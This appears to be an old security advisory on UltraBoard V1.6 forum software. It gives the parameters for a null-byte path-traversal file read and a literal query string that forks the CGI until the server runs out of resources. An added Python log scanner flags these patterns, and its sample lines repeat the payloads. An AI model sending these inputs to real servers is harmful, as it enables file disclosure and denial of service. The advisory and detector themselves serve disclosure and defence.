COMMAND
UltraBoard
SYSTEMS AFFECTED
UltraBoard V1.6X
PROBLEM
Rudi Carell found the following. He found some interesting things in
the "old" UltraBoard forum scripts (UltraBoard V 1.6). By using
the good old null byte (\000) it's possible to open "any" file on
the web server (with its permissions) running the "UltraBoard"
forum software.
CGI script:
UltraBoard.pl || UltraBoard.cgi
Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=
Juan M. Bello Rivas added the following. There's even more fun
available with old versions of UltraBoard (and latest beta of
UltraBoard 2000 is also vulnerable to this?). You can bring the
web server to its knees by issuing a request to the CGI like this:
QUERY_STRING=Session=../UltraBoard.pl%00%7c
It will start forking instances of the CGI until it eats all the
resources of the machine.
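For log review, an added example (not from the advisory or from UltraBoard) that flags requests shaped like the two above: it decodes the query string of UltraBoard.pl / UltraBoard.cgi requests and reports NUL bytes, ".." segments and pipe characters in Post and Session. The Common Log Format layout, the /cgi-bin/ path, the board name, the file name and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script names and parameters are the ones named in the advisory.
SCRIPT_RE = re.compile(r"/UltraBoard\.(?:pl|cgi)$", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WATCHED = {"Post", "Session"}


def inspect_request(target):
    """Return sorted findings for one request target (path?query)."""
    parts = urlsplit(target)
    if not SCRIPT_RE.search(parts.path):
        return []
    findings = set()
    # latin-1 maps each decoded byte to one code point, so %00 becomes "\x00".
    pairs = parse_qsl(parts.query, keep_blank_values=True, encoding="latin-1")
    for name, value in pairs:
        if name not in WATCHED:
            continue
        if "\x00" in value:
            findings.add(f"{name}: NUL byte")
        if ".." in re.split(r"[\\/]", value):
            findings.add(f"{name}: parent-directory segment")
        if "|" in value:
            findings.add(f"{name}: pipe character")
    return sorted(findings)


def scan_log(lines):
    """Return [(line_number, findings)] for log lines with findings."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        found = inspect_request(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits


# Constructed sample lines (assumed Common Log Format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/UltraBoard.pl?Action=PrintableTopic&Post=12&Board=general&Idle=10&Sort=0&Order=Descend&Page=0&Session= HTTP/1.0" 200 5120',
    '192.0.2.66 - - [01/Jan/2001:10:00:05 +0000] "GET /cgi-bin/UltraBoard.cgi?Action=PrintableTopic&Post=../../notes.txt%00&Board=general HTTP/1.0" 200 812',
    '192.0.2.66 - - [01/Jan/2001:10:00:09 +0000] "GET /cgi-bin/UltraBoard.pl?Session=../UltraBoard.pl%00%7c HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(number, found)
```

A legitimate Post or Session value should never need a NUL byte, a ".." segment or a pipe, so any hit on these parameters is worth a look.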
SOLUTION
Newer version fixes this?